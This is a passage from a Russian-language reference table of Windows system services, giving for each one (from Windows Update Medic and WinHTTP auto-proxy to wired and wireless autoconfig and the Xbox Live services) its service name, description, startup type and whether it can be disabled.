Рекомендации	Можно отключить
Комментарии	Для поддержания работоспособности устройства должна быть предусмотрена альтернативная стратегия обновления, ознакомьтесь с доступными вариантами.

Служба клиентский компонент Центра обновления Windows Медик

Имя	Описание
Имя службы	WaaSMedicSvc
Описание	Включает исправление и защиту компонентов клиентский компонент Центра обновления Windows.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

Служба автоматического обнаружения веб-прокси WinHTTP

Имя	Описание
Имя службы	WinHttpAutoProxySvc
Описание	WinHTTP реализует стек клиента HTTP и обеспечивает разработчикам API Win32 и компонент автоматизации COM для отправки запросов HTTP и получения ответов. Кроме того, WinHTTP обеспечивает поддержку автоматического обнаружения конфигурации прокси через реализацию протокола WPAD (Web Proxy Auto-Discovery).
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Все компоненты, которые используют сетевой стек, могут функционально зависеть от этой службы. Многие организации используют эту службу для настройки маршрутизации HTTP-подключений прокси-сервера в своих внутренних сетях. Без этого внутренние HTTP-подключения к Интернету не будут работать.

Служба автонастройки проводного доступа

Имя	Описание
Имя службы	dot3svc
Описание	Служба Wired AutoConfig (DOT3SVC) отвечает за проверку подлинности IEEE 802.1X в интерфейсах Ethernet. Если текущее развертывание проводных сетей использует проверку подлинности 802.1X, необходимо настроить службу DOT3SVC для возможности подключения уровня 2 и предоставления доступа к сетевым ресурсам. На проводные сети, не использующие проверку подлинности 802.1X, служба DOT3SVC не влияет.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Автоматическая настройка WLAN

Имя	Описание
Имя службы	WLANSVC
Описание	Служба WLANSVC предоставляет логику, необходимую для настройки, обнаружения, подключения к беспроводной локальной сети (WLAN) и ее отключения в соответствии со стандартами IEEE 802.11. Он также содержит логику, чтобы превратить компьютер в точку доступа программного обеспечения, чтобы другие устройства или компьютеры могли подключаться к компьютеру по беспроводной сети с помощью адаптера WLAN, который может поддерживать эту функцию. Остановка или отключение службы WLANSVC сделает все адаптеры WLAN на компьютере недоступными из пользовательского интерфейса сети Windows. Настоятельно рекомендуется использовать службу WLANSVC, если на компьютере есть адаптер WLAN.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Адаптер производительности WMI

Имя	Описание
Имя службы	wmiApSrv
Описание	Предоставляет сведения из библиотеки производительности от поставщиков инструментария управления Windows (WMI) клиентам сети. Эта служба доступна только при активации модуля поддержки данных производительности.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Не отключать
Комментарии	Нет

рабочие папки

Имя	Описание
Имя службы	workfolderssvc
Описание	Эта служба синхронизирует файлы с сервером рабочих папок, позволяя использовать файлы на любом из компьютеров и устройств, на которых настроены рабочие папки.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	ОК, чтобы отключить
Комментарии	Нет

Рабочая станция

Имя	Описание
Имя службы	LanmanWorkstation
Описание	Создает и поддерживает клиентские сетевые подключения к удаленным серверам по протоколу SMB. Если эта служба будет остановлена, эти подключения станут недоступными. Если служба отключена, все явно зависящие от нее службы запустить не удастся.
Установка	Всегда устанавливается
Тип запуска	Автоматически
Рекомендации	Не отключать
Комментарии	Нет

Автоматическая настройка WWAN

Имя	Описание
Имя службы	WwanSvc
Описание	Эта служба управляет мобильными широкополосными данными (GSM & CDMA) карта/встроенными адаптерами и подключениями модулей путем автоматической настройки сетей. Настоятельно рекомендуется, чтобы эта служба была запущена для оптимального взаимодействия с мобильными широкополосных устройств.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Можно отключить
Комментарии	Нет

Служба управления периферийными устройствами Xbox

Имя	Описание
Имя службы	XblAuthManager
Описание	Эта служба управляет подключенными Аксессуарами Xbox.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Следует отключить
Комментарии	Нет

Диспетчер проверки подлинности Xbox Live.

Имя	Описание
Имя службы	XblAuthManager
Описание	Предоставляет службы аутентификации и авторизации для взаимодействия с Xbox Live. Если эта служба остановлена, некоторые приложения могут не работать должным образом.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Следует отключить
Комментарии	Нет

Сохранение игр на Xbox Live.

Имя	Описание
Имя службы	XblGameSave
Описание	Эта служба синхронизирует данные сохранения игр для Xbox Live с поддержкой сохранения. Если эта служба остановлена, данные сохранения игры не будут передаваться в Xbox Live или скачиваться оттуда.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Следует отключить
Комментарии	Нет

Сетевая служба Xbox Live.

Имя	Описание
Имя службы	XboxNetApiSvc
Описание	Эта служба поддерживает программный интерфейс приложения XboxLive для сетевых подключений Windows.
Установка	Всегда устанавливается
Тип запуска	Вручную
Рекомендации	Следует отключить
Комментарии	Нет